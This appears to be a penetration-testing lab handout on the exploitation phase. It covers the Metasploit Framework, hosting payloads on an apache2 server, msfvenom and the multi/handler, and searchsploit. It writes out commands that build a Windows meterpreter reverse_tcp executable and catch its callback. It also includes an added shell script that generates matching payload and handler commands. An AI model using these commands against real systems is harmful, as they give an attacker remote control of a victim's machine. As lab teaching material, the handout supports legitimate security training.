Exploitation

The Metasploit Framework

Simply put, the Metasploit Framework is a platform of tools for developing and using exploits. Within the framework is a database that stores the information gathered during scanning, enumeration, and exploitation. The database supports separate workspaces, which keep the information for each engagement apart. A workspace can be exported and imported when it needs to be shared with team members. Metasploit Community and Metasploit Pro are additional options that display workspace information through a web interface.

Web Server (apache2)

There will be times when you need a web server to serve files to a victim. One way to do this in Kali is to start the apache2 service and create a separate directory just for payloads. Once the directory exists, you can either create payloads with msfvenom and move them into that directory, or run the msfvenom commands from the payloads directory itself.

# service apache2 start
# cd /var/www/html
# mkdir payloads
# cd payloads

Msfvenom

Msfvenom is a tool that allows for the creation of custom shellcode. For this lab, you can run this command from the newly created payloads directory. You should research different ways to use msfvenom to create custom exploits with custom payloads. A few useful commands are:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[preferred port] -f exe > anyname.exe

Multi-handler

Using msfvenom in conjunction with the multi-handler allows you to exploit a Windows machine and gain the coveted Meterpreter session.

# msfconsole
msf> use exploit/multi/handler
multi-handler> set payload windows/meterpreter/reverse_tcp
multi-handler> set lhost [your ip]
multi-handler> set lport [your preferred port]
multi-handler> exploit -j
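A common failure in this lab is a payload built with one LHOST/LPORT and a handler started with another. As an added example that is not part of the lab handout, the POSIX shell helper below validates the address and port once and emits both the msfvenom command from above and a matching msfconsole resource script for the handler; the /var/www/html/payloads path and running the script with `msfconsole -r handler.rc` are assumptions.

```shell
#!/bin/sh
# Added example (not part of the lab handout). Validates LHOST/LPORT once and
# emits both the lab's msfvenom command and a matching msfconsole resource
# script, so payload and handler can never disagree on the callback address.
# Assumptions: payloads live in /var/www/html/payloads (the lab directory) and
# the resource script is run with "msfconsole -r handler.rc".

# valid_ipv4 ADDR: succeeds only for a dotted quad with every octet 0-255
valid_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    rest=$1
    while [ -n "$rest" ]; do
        octet=${rest%%.*}              # leading octet
        [ "$octet" -le 255 ] || return 1
        [ "$rest" = "$octet" ] && break   # last octet consumed
        rest=${rest#*.}                # drop it and continue
    done
    return 0
}

# valid_port PORT: succeeds only for an integer in 1-65535
valid_port() {
    echo "$1" | grep -Eq '^[0-9]{1,5}$' || return 1
    if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
        return 0
    fi
    return 1
}

# venom_cmd LHOST LPORT NAME: prints the lab's msfvenom command, filled in
venom_cmd() {
    valid_ipv4 "$1" && valid_port "$2" || return 1
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe > /var/www/html/payloads/%s\n' \
        "$1" "$2" "$3"
}

# handler_rc LHOST LPORT: prints the multi/handler steps as a resource script
handler_rc() {
    valid_ipv4 "$1" && valid_port "$2" || return 1
    printf 'use exploit/multi/handler\n'
    printf 'set payload windows/meterpreter/reverse_tcp\n'
    printf 'set lhost %s\nset lport %s\n' "$1" "$2"
    printf 'exploit -j\n'
}

# Usage: venom_cmd 10.0.0.5 4444 lab.exe; handler_rc 10.0.0.5 4444 > handler.rc
```

Both functions refuse invalid input rather than emitting a command, so a typo in the address is caught before a payload is built.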
    • Press “Return” once complete and type “sessions”

Finding Exploits

Once an analyst has completed the scanning and enumeration phase of a pentest, they must use the results to find vulnerabilities on the target system. Once the vulnerabilities have been found, their associated exploit(s) can be used against the target system.

Search

You can search with a single keyword for whatever you are looking for, or make the query very specific.

Searchsploit

Searchsploit is a command-line-based tool that allows you to search for various exploits. The exploits are stored in a local database within Kali. This means that you do not need internet access to find them.

msf > searchsploit proftpd
msf > searchsploit -w proftpd

To open searchsploit from the menu, click Applications > Exploitation Tools > searchsploit.
